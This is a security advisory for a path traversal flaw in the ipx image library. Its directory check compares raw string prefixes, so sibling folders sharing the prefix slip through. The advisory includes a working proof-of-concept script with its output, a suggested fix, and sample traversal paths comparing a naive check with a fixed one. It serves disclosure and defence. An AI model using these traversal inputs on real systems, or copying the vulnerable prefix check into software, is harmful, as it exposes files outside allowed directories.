GHSA-mm3p-j368-7jcr: IPX Allows Path Traversal via Prefix Matching Bypass

Summary

The approach used to check whether a path is within allowed directories is vulnerable to path prefix bypass when the allowed directories do not end with a path separator. This occurs because the check relies on a raw string prefix comparison.

PoC

  • setup
mkdir ~/public123
# move a png file under ~/public123 with name test.png
cd
npm i ipx
  • main.js
import { createIPX, ipxFSStorage } from "ipx";

const ipx = createIPX({
  storage: ipxFSStorage({ dir: "./public" }),
});


(async () => {
  {
    // Reads a file outside ./public because the sibling folder shares the "public" prefix
    const source = await ipx("../public123/test.png");
    const { data, format } = await source.process();
    console.log(format); // prints the image format: png
  }
  {
    try {
      // Forbidden path: the sibling folder does not share the prefix
      const source = await ipx("../publi123/test.png");
      const { data, format } = await source.process();
      console.log(data);
    } catch (err) {
      console.log(err.message); // Forbidden path: ...
    }
  }
})();
  • node main.js
png
Forbidden path: /../publi123/test.png

Impact

Path Traversal

Possible Fix

Check whether the dir ends with / (the path separator) and, if it does not, append one before calling startsWith.
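
The raw prefix comparison next to a separator-aware one, run over the two PoC paths, as an added example (not ipx's own code). The function names and the extra sample paths are constructed for illustration.

```javascript
const path = require("node:path");

// Raw string prefix comparison, the pattern the advisory describes.
function isInsideNaive(baseDir, requested) {
  const base = path.resolve(baseDir);
  const target = path.resolve(base, requested);
  return target.startsWith(base);
}

// Separator-aware comparison, following the "Possible Fix" above.
function isInsideFixed(baseDir, requested) {
  const base = path.resolve(baseDir);
  const target = path.resolve(base, requested);
  const baseWithSep = base.endsWith(path.sep) ? base : base + path.sep;
  // The base directory itself counts as inside; anything else must sit
  // below "<base><sep>", so "public123" no longer matches "public".
  return target === base || target.startsWith(baseWithSep);
}

// Constructed inputs: the two PoC paths plus two ordinary cases.
const SAMPLES = [
  "../public123/test.png", // sibling directory sharing the prefix
  "../publi123/test.png",  // sibling directory without the prefix
  "img/test.png",          // legitimate file below the base
  "img/../../secret.png",  // classic traversal out of the base
];

// Returns one row per sample with the verdict of each check.
function compare(baseDir, samples = SAMPLES) {
  return samples.map((requested) => ({
    requested,
    naive: isInsideNaive(baseDir, requested),
    fixed: isInsideFixed(baseDir, requested),
  }));
}

console.table(compare("./public"));
```

String checks like these do not follow symlinks, so a symlink inside the base directory that points elsewhere needs a separate check on the resolved real path.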

References

  • GHSA-mm3p-j368-7jcr
  • unjs/ipx@81693dd
